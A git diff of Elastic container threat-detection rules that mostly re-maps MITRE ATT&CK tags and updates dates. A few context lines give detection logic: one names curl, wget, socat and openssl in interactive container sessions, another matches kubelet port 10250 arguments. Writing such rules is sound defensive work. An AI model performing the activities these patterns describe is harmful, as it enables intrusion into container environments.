-id = "T1082" -name = "System Information Discovery" -reference = "https://attack.mitre.org/techniques/T1082/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" diff --git a/rules/integrations/cloud_defend/discovery_suspicious_network_tool_launched_inside_a_container.toml b/rules/integrations/cloud_defend/discovery_suspicious_network_tool_launched_inside_a_container.toml index 6b685a4acac..94048cb61ca 100644 --- a/rules/integrations/cloud_defend/discovery_suspicious_network_tool_launched_inside_a_container.toml +++ b/rules/integrations/cloud_defend/discovery_suspicious_network_tool_launched_inside_a_container.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -66,16 +66,7 @@ Containers are lightweight, portable units that encapsulate applications and the risk_score = 21 rule_id = "1a289854-5b78-49fe-9440-8a8096b1ab50" severity = "low" -tags = [ - "Data Source: Elastic Defend for Containers", - "Domain: Container", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Tactic: Command and Control", - "Tactic: Reconnaissance", - "Resources: Investigation Guide", -] +tags = ["Tactic: Discovery", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -121,6 +112,11 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1040" +name = "Network Sniffing" +reference = "https://attack.mitre.org/techniques/T1040/" + [[rule.threat.technique]] id = "T1046" name = "Network Service Discovery" @@ -130,29 +126,3 @@ reference = "https://attack.mitre.org/techniques/T1046/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1105" -name = "Ingress Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1105/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1595" -name = "Active Scanning" -reference = "https://attack.mitre.org/techniques/T1595/" - -[rule.threat.tactic] -id = "TA0043" -name = "Reconnaissance" -reference = "https://attack.mitre.org/tactics/TA0043/" diff --git a/rules/integrations/cloud_defend/discovery_tool_enumeration.toml b/rules/integrations/cloud_defend/discovery_tool_enumeration.toml index b571d34b507..61bf6736889 100644 --- a/rules/integrations/cloud_defend/discovery_tool_enumeration.toml +++ b/rules/integrations/cloud_defend/discovery_tool_enumeration.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/01/27" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -114,11 +114,6 @@ id = "T1518" name = "Software Discovery" reference = "https://attack.mitre.org/techniques/T1518/" -[[rule.threat.technique]] -id = "T1613" -name = "Container and Resource Discovery" -reference = "https://attack.mitre.org/techniques/T1613/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" diff --git a/rules/integrations/cloud_defend/execution_direct_interactive_kubernetes_api_request.toml b/rules/integrations/cloud_defend/execution_direct_interactive_kubernetes_api_request.toml index eca6ed47139..6b067f4f645 100644 --- a/rules/integrations/cloud_defend/execution_direct_interactive_kubernetes_api_request.toml +++ b/rules/integrations/cloud_defend/execution_direct_interactive_kubernetes_api_request.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/01/27" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -62,15 +62,7 @@ The rule flags interactive use of curl, wget, openssl, busybox ssl_client, socat risk_score = 21 rule_id = "26a989d2-010e-4dae-b46b-689d03cc22b3" severity = "low" -tags = [ - "Data Source: Elastic Defend for Containers", - "Domain: Container", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Discovery", - "Resources: Investigation Guide", -] +tags = ["Tactic: Discovery", "Tactic: Lateral Movement", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -123,29 +115,29 @@ process.interactive == true and container.id like "*" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" +id = "T1613" +name = "Container and Resource Discovery" +reference = "https://attack.mitre.org/techniques/T1613/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" [[rule.threat]] framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1613" -name = "Container and Resource Discovery" -reference = "https://attack.mitre.org/techniques/T1613/" +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" [rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/integrations/cloud_defend/execution_interactive_file_creation_followed_by_execution.toml b/rules/integrations/cloud_defend/execution_interactive_file_creation_followed_by_execution.toml index 45afe8cf54e..40bd33e4804 100644 --- a/rules/integrations/cloud_defend/execution_interactive_file_creation_followed_by_execution.toml +++ b/rules/integrations/cloud_defend/execution_interactive_file_creation_followed_by_execution.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/06" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -51,15 +51,7 @@ This detects an interactive session inside a running Linux container creating a risk_score = 47 rule_id = "b799720e-40d0-4dd6-9c9c-4f193a6ed643" severity = "medium" -tags = [ - "Data Source: Elastic Defend for Containers", - "Domain: Container", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Command and Control", - "Resources: Investigation Guide", -] +tags = ["Tactic: Execution", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -74,11 +66,6 @@ sequence by container.id, user.id with maxspan=3s [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -name = "Execution" -id = "TA0002" -reference = "https://attack.mitre.org/tactics/TA0002/" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" @@ -89,15 +76,7 @@ id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" -[[rule.threat]] -framework = "MITRE ATT&CK" - [rule.threat.tactic] -name = "Command and Control" -id = "TA0011" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat.technique]] -name = "Application Layer Protocol" -id = "T1071" -reference = "https://attack.mitre.org/techniques/T1071/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/integrations/cloud_defend/execution_interactive_file_creation_in_system_binary_locations.toml b/rules/integrations/cloud_defend/execution_interactive_file_creation_in_system_binary_locations.toml index aa6c4f5a487..a7076eb7113 100644 --- a/rules/integrations/cloud_defend/execution_interactive_file_creation_in_system_binary_locations.toml +++ b/rules/integrations/cloud_defend/execution_interactive_file_creation_in_system_binary_locations.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/06" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -52,16 +52,7 @@ This detects an interactive session in a running Linux container creating new fi risk_score = 47 rule_id = "05a50000-9886-4695-ad33-3f990dc142e2" severity = "medium" -tags = [ - "Data Source: Elastic Defend for Containers", - "Domain: Container", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Command and Control", - "Tactic: Defense Evasion", - "Resources: Investigation Guide", -] +tags = ["Tactic: Command and Control", "Tactic: Defense Evasion", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -78,38 +69,25 @@ file.path like ( [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -name = "Execution" -id = "TA0002" -reference = "https://attack.mitre.org/tactics/TA0002/" - [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" [rule.threat.tactic] -name = "Command and Control" id = "TA0011" +name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" -[[rule.threat.technique]] -name = "Application Layer Protocol" -id = "T1071" -reference = "https://attack.mitre.org/techniques/T1071/" - [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" + [rule.threat.tactic] -name = "Defense Evasion" id = "TA0005" +name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/cloud_defend/execution_interactive_shell_spawned_from_inside_a_container.toml b/rules/integrations/cloud_defend/execution_interactive_shell_spawned_from_inside_a_container.toml index 6b221375e8f..01fd7364cb3 100644 --- a/rules/integrations/cloud_defend/execution_interactive_shell_spawned_from_inside_a_container.toml +++ b/rules/integrations/cloud_defend/execution_interactive_shell_spawned_from_inside_a_container.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -98,6 +98,11 @@ id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" +[[rule.threat.technique]] +id = "T1609" +name = "Container Administration Command" +reference = "https://attack.mitre.org/techniques/T1609/" + [rule.threat.tactic] id = "TA0002" name = "Execution" diff --git a/rules/integrations/cloud_defend/execution_kubeletctl_execution.toml b/rules/integrations/cloud_defend/execution_kubeletctl_execution.toml index 4d369ab6944..9ecd8a31745 100644 --- a/rules/integrations/cloud_defend/execution_kubeletctl_execution.toml +++ b/rules/integrations/cloud_defend/execution_kubeletctl_execution.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -88,29 +88,24 @@ process.interactive == true and container.id like "?*" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" +id = "T1613" +name = "Container and Resource Discovery" +reference = "https://attack.mitre.org/techniques/T1613/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" [[rule.threat]] framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1613" -name = "Container and Resource Discovery" -reference = "https://attack.mitre.org/techniques/T1613/" +id = "T1609" +name = "Container Administration Command" +reference = "https://attack.mitre.org/techniques/T1609/" [rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/integrations/cloud_defend/execution_netcat_listener_established_inside_a_container.toml b/rules/integrations/cloud_defend/execution_netcat_listener_established_inside_a_container.toml index 8c8ff36688b..eec7a040eab 100644 --- a/rules/integrations/cloud_defend/execution_netcat_listener_established_inside_a_container.toml +++ b/rules/integrations/cloud_defend/execution_netcat_listener_established_inside_a_container.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -66,14 +66,7 @@ Netcat is a versatile networking tool used for reading and writing data across n risk_score = 47 rule_id = "a52a9439-d52c-401c-be37-2785235c6547" severity = "medium" -tags = [ - "Data Source: Elastic Defend for Containers", - "Domain: Container", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Resources: Investigation Guide", -] +tags = ["Tactic: Command and Control", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -112,16 +105,11 @@ process.args like~ ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" +id = "T1095" +name = "Non-Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1095/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/integrations/cloud_defend/execution_payload_downloaded_and_piped_to_shell.toml b/rules/integrations/cloud_defend/execution_payload_downloaded_and_piped_to_shell.toml index 929a3fbb945..8be32a0812f 100644 --- a/rules/integrations/cloud_defend/execution_payload_downloaded_and_piped_to_shell.toml +++ b/rules/integrations/cloud_defend/execution_payload_downloaded_and_piped_to_shell.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -54,16 +54,7 @@ references = [ risk_score = 47 rule_id = "a750bbcc-863f-41ef-9924-fd8224e23694" severity = "medium" -tags = [ - "Data Source: Elastic Defend for Containers", - "Domain: Container", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Command and Control", - "Tactic: Defense Evasion", - "Resources: Investigation Guide", -] +tags = ["Tactic: Command and Control", "Tactic: Execution", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -99,10 +90,18 @@ sequence by process.parent.entity_id, container.id with maxspan=1s [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + [rule.threat.tactic] -name = "Execution" -id = "TA0002" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1059" @@ -114,23 +113,7 @@ id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -name = "Command and Control" -id = "TA0011" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat.technique]] -name = "Application Layer Protocol" -id = "T1071" -reference = "https://attack.mitre.org/techniques/T1071/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [rule.threat.tactic] -name = "Defense Evasion" -id = "TA0005" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/integrations/cloud_defend/execution_potential_direct_kubelet_access_via_process_args.toml b/rules/integrations/cloud_defend/execution_potential_direct_kubelet_access_via_process_args.toml index 1e80e6c6c4e..fb7dbc5c834 100644 --- a/rules/integrations/cloud_defend/execution_potential_direct_kubelet_access_via_process_args.toml +++ b/rules/integrations/cloud_defend/execution_potential_direct_kubelet_access_via_process_args.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -59,15 +59,7 @@ references = [ risk_score = 47 rule_id = "b4bd186b-69c6-45ad-8bef-5c35bbadeaef" severity = "medium" -tags = [ - "Data Source: Elastic Defend for Containers", - "Domain: Container", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Discovery", - "Resources: Investigation Guide", -] +tags = ["Tactic: Discovery", "Tactic: Lateral Movement", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -79,29 +71,24 @@ process.args like "http*:10250*" and process.interactive == true and container.i framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" +id = "T1613" +name = "Container and Resource Discovery" +reference = "https://attack.mitre.org/techniques/T1613/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" [[rule.threat]] framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1613" -name = "Container and Resource Discovery" -reference = "https://attack.mitre.org/techniques/T1613/" +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" [rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/integrations/cloud_defend/execution_suspicious_file_made_executable_via_chmod_inside_a_container.toml b/rules/integrations/cloud_defend/execution_suspicious_file_made_executable_via_chmod_inside_a_container.toml index 37ebcaa3c19..10daf2c1993 100644 --- a/rules/integrations/cloud_defend/execution_suspicious_file_made_executable_via_chmod_inside_a_container.toml +++ b/rules/integrations/cloud_defend/execution_suspicious_file_made_executable_via_chmod_inside_a_container.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -62,15 +62,7 @@ references = [ risk_score = 21 rule_id = "ec604672-bed9-43e1-8871-cf591c052550" severity = "low" -tags = [ - "Data Source: Elastic Defend for Containers", - "Domain: Container", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Defense Evasion", - "Resources: Investigation Guide", -] +tags = ["Tactic: Defense Evasion", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -95,19 +87,6 @@ container.id like "?*" and not process.args == "-x" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1222" name = "File and Directory Permissions Modification" diff --git a/rules/integrations/cloud_defend/execution_suspicious_interactive_interpreter_command_execution.toml b/rules/integrations/cloud_defend/execution_suspicious_interactive_interpreter_command_execution.toml index 674f355202d..64fe42e9846 100644 --- a/rules/integrations/cloud_defend/execution_suspicious_interactive_interpreter_command_execution.toml +++ b/rules/integrations/cloud_defend/execution_suspicious_interactive_interpreter_command_execution.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -54,15 +54,7 @@ references = [ risk_score = 47 rule_id = "cd24c340-b778-44bd-ab69-2f739bd70ce1" severity = "medium" -tags = [ - "Data Source: Elastic Defend for Containers", - "Domain: Container", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Command and Control", - "Resources: Investigation Guide", -] +tags = ["Tactic: Execution", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -117,45 +109,22 @@ process.parent.executable != null and ( [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Execution" - id = "TA0002" - reference = "https://attack.mitre.org/tactics/TA0002/" - - [[rule.threat.technique]] - id = "T1059" - name = "Command and Scripting Interpreter" - reference = "https://attack.mitre.org/techniques/T1059/" - - [[rule.threat.technique.subtechnique]] - name = "Unix Shell" - id = "T1059.004" - reference = "https://attack.mitre.org/techniques/T1059/004/" - - [[rule.threat.technique.subtechnique]] - name = "Python" - id = "T1059.006" - reference = "https://attack.mitre.org/techniques/T1059/006/" - - [[rule.threat.technique.subtechnique]] - name = "Lua" - id = "T1059.011" - reference = "https://attack.mitre.org/techniques/T1059/011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - - [rule.threat.tactic] - name = "Command and Control" - id = "TA0011" - reference = "https://attack.mitre.org/tactics/TA0011/" - - [[rule.threat.technique]] - name = "Application Layer Protocol" - id = "T1071" - reference = "https://attack.mitre.org/techniques/T1071/" - - [[rule.threat.technique.subtechnique]] - name = "Web Protocols" - id = "T1071.001" - reference = "https://attack.mitre.org/techniques/T1071/001/" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.011" +name = "Lua" +reference = "https://attack.mitre.org/techniques/T1059/011/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/integrations/cloud_defend/persistence_modification_of_persistence_relevant_files.toml b/rules/integrations/cloud_defend/persistence_modification_of_persistence_relevant_files.toml index f2710c97edc..118bdfd306b 100644 --- a/rules/integrations/cloud_defend/persistence_modification_of_persistence_relevant_files.toml +++ b/rules/integrations/cloud_defend/persistence_modification_of_persistence_relevant_files.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -58,16 +58,7 @@ references = [ risk_score = 21 rule_id = "f246e70e-5e20-4006-8460-d72b023d6adf" severity = "low" -tags = [ - "Data Source: Elastic Defend for Containers", - "Domain: Container", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Execution", - "Tactic: Privilege Escalation", - "Resources: Investigation Guide", -] +tags = ["Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -115,25 +106,35 @@ not process.name in ("apt", "apt-get", "dnf", "microdnf", "yum", "zypper", "tdnf [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" +[[rule.threat.technique.subtechnique]] +id = "T1053.002" +name = "At" +reference = "https://attack.mitre.org/techniques/T1053/002/" + [[rule.threat.technique.subtechnique]] id = "T1053.003" name = "Cron" reference = "https://attack.mitre.org/techniques/T1053/003/" +[[rule.threat.technique.subtechnique]] +id = "T1053.006" +name = "Systemd Timers" +reference = "https://attack.mitre.org/techniques/T1053/006/" + [[rule.threat.technique]] -id = "T1037" -name = "Boot or Logon Initialization Scripts" -reference = "https://attack.mitre.org/techniques/T1037/" +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique.subtechnique]] +id = "T1543.002" +name = "Systemd Service" +reference = "https://attack.mitre.org/techniques/T1543/002/" [[rule.threat.technique]] id = "T1546" @@ -153,21 +154,6 @@ reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[[rule.threat.technique]] -id = "T1053" -name = "Scheduled Task/Job" -reference = "https://attack.mitre.org/techniques/T1053/" - -[[rule.threat.technique.subtechnique]] -id = "T1053.003" -name = "Cron" -reference = "https://attack.mitre.org/techniques/T1053/003/" - [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" @@ -182,21 +168,3 @@ reference = "https://attack.mitre.org/techniques/T1548/003/" id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1053" -name = "Scheduled Task/Job" -reference = "https://attack.mitre.org/techniques/T1053/" - -[[rule.threat.technique.subtechnique]] -id = "T1053.003" -name = "Cron" -reference = "https://attack.mitre.org/techniques/T1053/003/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/integrations/cloud_defend/persistence_ssh_authorized_keys_modification_inside_a_container.toml b/rules/integrations/cloud_defend/persistence_ssh_authorized_keys_modification_inside_a_container.toml index a177a35115c..1458b7ed0b3 100644 --- a/rules/integrations/cloud_defend/persistence_ssh_authorized_keys_modification_inside_a_container.toml +++ b/rules/integrations/cloud_defend/persistence_ssh_authorized_keys_modification_inside_a_container.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -60,15 +60,7 @@ In containerized environments, SSH keys facilitate secure access, but adversarie risk_score = 47 rule_id = "f7769104-e8f9-4931-94a2-68fc04eadec3" severity = "medium" -tags = [ - "Data Source: Elastic Defend for Containers", - "Domain: Container", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Lateral Movement", - "Resources: Investigation Guide", -] +tags = ["Tactic: Persistence", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -94,31 +86,3 @@ reference = "https://attack.mitre.org/techniques/T1098/004/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" - -[[rule.threat.technique.subtechnique]] -id = "T1021.004" -name = "SSH" -reference = "https://attack.mitre.org/techniques/T1021/004/" - -[[rule.threat.technique]] -id = "T1563" -name = "Remote Service Session Hijacking" -reference = "https://attack.mitre.org/techniques/T1563/" - -[[rule.threat.technique.subtechnique]] -id = "T1563.001" -name = "SSH Hijacking" -reference = "https://attack.mitre.org/techniques/T1563/001/" - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/integrations/cloud_defend/persistence_suspicious_echo_or_printf_execution.toml b/rules/integrations/cloud_defend/persistence_suspicious_echo_or_printf_execution.toml index 4e79c7957c8..379f019ead4 100644 --- a/rules/integrations/cloud_defend/persistence_suspicious_echo_or_printf_execution.toml +++ b/rules/integrations/cloud_defend/persistence_suspicious_echo_or_printf_execution.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -56,16 +56,7 @@ references = [ 